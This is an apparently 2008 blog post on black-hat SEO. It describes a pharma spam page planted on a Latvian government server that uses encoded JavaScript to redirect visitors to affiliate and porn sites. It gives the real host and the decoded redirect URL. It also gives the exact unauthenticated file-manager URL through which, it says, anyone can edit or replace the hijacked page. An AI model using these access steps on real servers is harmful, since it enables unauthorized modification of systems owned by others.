If you are like me, you probably track a couple pharm related request on Google to understand more about BlackHat Seo strategy that are really working . I’ve came across this article in french where the author, a french blackhat, explains a discovery he made looking at the results in Google for a viagra related query.

This webpage (http://sf.lm.gov.lv/CMS/modules/EReditor/jscripts/tiny_mce/

plugins/filemanager/files/esf/in/buycheapviagraonlineukwr.htm)

is on one of the webservers of the government of Latvia and definitly not putted there my government officials. If you were visiting this URL from Google, you were redirected to a pharm affiliate site. If you we’re visiting this URL directly, you we’re redirected to a porn site. The redirection is made using encoded javascript like usual. Once he decoded the javascript, we can see that the redirection is made using this URL. (You can see the code in the original article if you want to see it)

http://www.finance-leaders.com/feed2.php?keyword=”+ escape(”188″)+”&feed=8&ref=”+ escape(document.referrer))

The website http://sf.lm.gov.lv/ have a security problem that anyone can exploit right now.

The important point is that anyone can modify the javascript to redirect the traffic to the page they want. (No point of doing that now, first it’s illegal, and second, the page isn’t indexed in Google anymore.)

All you have to do is to go on

http://sf.lm.gov.lv/CMS/modules/EReditor/jscripts/tiny_mce/plugins/filemanager/

frameset.php?a=b&js=mcFileManager.insertFileToForm&url=/CMS/modules/

EReditor/jscripts/tiny_mce/plugins/filemanager/files/esf/in/

buycheapviagraonlineukwr.htm&initial_path=mce_clear&initial_rootpath=

mce_clear&remember=true

and now going in the sub-directory /esf/in where the page buycheapviagraonlineukwr.htm is. You can edit it, delete it and replace it with whatever you want (so basicly changing the redirect to your own affiliate account). Google isn’t able to understand the encoded javascript but see the keywords filled page.

Something the original article don’t talk about is how the blackhat that made that page linkbuilded it.

What we can learn using yahoo is the number of links pointing to the page is very low and was linkbuilded using the usual blackhat pattern of spamming guestbooks and forums. But what is weirder, is that domain have been linkbuilded by the blackhats accoring to yahoo linkdomain. And looking at those URL, you can find plenty of vulnerable webservers that are used to spam the hell out the search engines.

And because the blackhat cannot protect is work (sure, he hack those webservers and cannot patch them), anyone can go and switch the affialite code. By the way, this page was 11th on one of the biggest keywords.

2008 is the year where Blackhat SEO met Hacking on a larger scale. This is just one of the proof.